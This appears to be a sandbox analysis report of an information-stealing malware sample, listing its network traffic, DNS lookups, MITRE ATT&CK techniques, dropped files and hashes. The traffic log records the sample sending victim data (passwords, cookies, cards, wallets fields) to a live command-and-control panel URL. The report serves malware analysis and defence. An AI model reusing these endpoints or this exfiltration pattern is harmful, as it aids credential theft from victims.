GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

HTTP Response

204
23.62.61.146:443

https://www.bing.com/aes/c.gif?RG=aa8a26ab71d14154a517e164a627c2ff&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131910Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038

tls, http2

1.4kB
5.3kB
16
10

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=aa8a26ab71d14154a517e164a627c2ff&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131910Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/

http

Zip.exe

549 B
1.6kB
9
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
145.14.144.245:80

http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0

http

NZqhGfqWq.exe

468.4kB
32.7kB
352
289

HTTP Request

POST http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0

HTTP Response

404
145.14.144.245:80

http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

http

NZqhGfqWq.exe

744 B
22.0kB
14
22

HTTP Request

GET http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

HTTP Response

404
145.14.144.245:80

http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0

http

NZqhGfqWq.exe

55.6kB
633 B
45
14

HTTP Request

POST http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0
145.14.144.245:80

http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

http

NZqhGfqWq.exe

744 B
22.0kB
14
22

HTTP Request

GET http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

HTTP Response

404
145.14.144.245:80

http://unseamed-semaphore.000webhostapp.com/Panel/task.php?hwid=GBBFEBFBFF00090672

http

NZqhGfqWq.exe

750 B
22.6kB
14
22

HTTP Request

GET http://unseamed-semaphore.000webhostapp.com/Panel/task.php?hwid=GBBFEBFBFF00090672

HTTP Response

404
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

100.9kB
2.8MB
2042
2038

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14

8.8.8.8:53

ip-api.com

dns

Zip.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

77.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

77.190.18.2.in-addr.arpa
8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

146.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

146.61.62.23.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

unseamed-semaphore.000webhostapp.com

dns

NZqhGfqWq.exe

82 B
148 B
1
1

DNS Request

unseamed-semaphore.000webhostapp.com

DNS Response

145.14.144.245
8.8.8.8:53

245.144.14.145.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

245.144.14.145.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

36.56.20.217.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

36.56.20.217.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GB_BFEBFBFF00090672.zip

Filesize
443KB

MD5
6ff1916b27f97eb60cfe05f88e43b53a

SHA1
6db96e6dd80b8a90b91b8ebd321bfa5cb096e31a

SHA256
35b41e6b95e9c1e0b45410cb4ad4a72e6fe0f1037db45d6dfa4d25a456a51d70

SHA512
30998d889903062c9ee2fe65a6e24abfac319a3e2f1a47d17e3479228d05a600f13c7ccc1c01bdc421371faac6d5e93496f1245e090e80a73342b68a3dcc2305

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_BFEBFBFF00090672\ProgramList.txt

Filesize
3KB

MD5
db688fb8707737b3179a33fdc1e85951

SHA1
c25c9d25afe2222324c5bc1581f9d275efc70b8a

SHA256
533e12e2d8cc7c43c4c9bc2ab2428a8dbfdcb4f18126d6f63dfa33f4452ea56f

SHA512
da2d85750c45a22ba2d7124bb7f39f62fea0d0d7902ebe5114ca82d8e4c50499a8e2335cec18072ca17f437294981a0041bbf5672a129e16efea769c55906268

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_BFEBFBFF00090672\ProsessList.txt

Filesize
1KB

MD5
97d31405f4f5028ae0850b7d426c3e07

SHA1
eca88b014bdf988bc2e383dc0e7020b5c7fddaaf

SHA256
bac86897b4c8aaf34b7d3d56497edfd515b99661c4f473ea7d953ca768b3c40f

SHA512
c095cb0a31aaaa0bb5ef4eebcdd1207b65f46f4a412d525227f0cfd683df6c3b805128acf18e6121ff84039866d7afb4e265b5e894e3ca1bd9e9f369fcd1a7b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_BFEBFBFF00090672\Screenshot.png

Filesize
443KB

MD5
7fe6943e706cd5634a7f1269b3de070c

SHA1
9fb5104079853eddb3c63fc19b990516eae34bdc

SHA256
5a9e453dd2161fa199a8113a0a4a9b33be2988ebb579eaa1e1c2ad52f6d6877a

SHA512
da6c4d1e331e28bc7eca2f79893b4ccbcedbd63c21a3b53b0216862130d74fc42c8ac87941c60b621b4db19d0248191207745e75b8632e6d48c8a6d33af63f52

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_BFEBFBFF00090672\info.txt

Filesize
315B

MD5
c74cef5f50c04f09fe0f0de518ebe6a0

SHA1
3cac0da4b7be828e86c0e78f051496e4324f4cef

SHA256
2bf506ec760e6ee25424bbebba33640ca5d29ebd1a5572eac3867faa67a1c546

SHA512
ded54d437ff6e17e33734481406eaf886b5c152781d4145da181eda4b94b959ba54b9c3d16cedec91e983a31f72d441e97c0983eeaa398c076ccae61852706ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zip.exe

Filesize
31KB

MD5
af07e88ec22cc90cebfda29517f101b9

SHA1
a9e6f4ae24abf76966d7db03af9c802e83760143

SHA256
1632fbff8edc50f2c7ef7bb2fe9b2c17e6472094f0d365a98e0dec2a12fa8ec2

SHA512
b4575af98071fc8d46c022e24bfb2c1567d7e5f3de0d8fb5fee6f876985c7780a5b145f645725ff27a15367162aa08490ac2f8dd59d705663094fe4e1eeec7bc

Download Submit
memory/840-26-0x000001C6D7270000-0x000001C6D727A000-memory.dmp

Filesize
40KB

Download
memory/840-34-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/840-24-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/840-25-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/840-23-0x000001C6BCDC0000-0x000001C6BCDD0000-memory.dmp

Filesize
64KB

Download
memory/840-27-0x000001C6D72A0000-0x000001C6D72B2000-memory.dmp

Filesize
72KB

Download
memory/1948-0-0x00007FFB470E3000-0x00007FFB470E5000-memory.dmp

Filesize
8KB

Download
memory/1948-4-0x000000001C850000-0x000000001CD78000-memory.dmp

Filesize
5.2MB

Download
memory/1948-3-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/1948-2-0x000000001BA50000-0x000000001BC12000-memory.dmp

Filesize
1.8MB

Download
memory/1948-7-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/1948-35-0x00007FFB470E3000-0x00007FFB470E5000-memory.dmp

Filesize
8KB

Download
memory/1948-1-0x0000000000990000-0x0000000000A1C000-memory.dmp

Filesize
560KB

Download
memory/1948-37-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download
memory/1948-38-0x00007FFB470E0000-0x00007FFB47BA1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.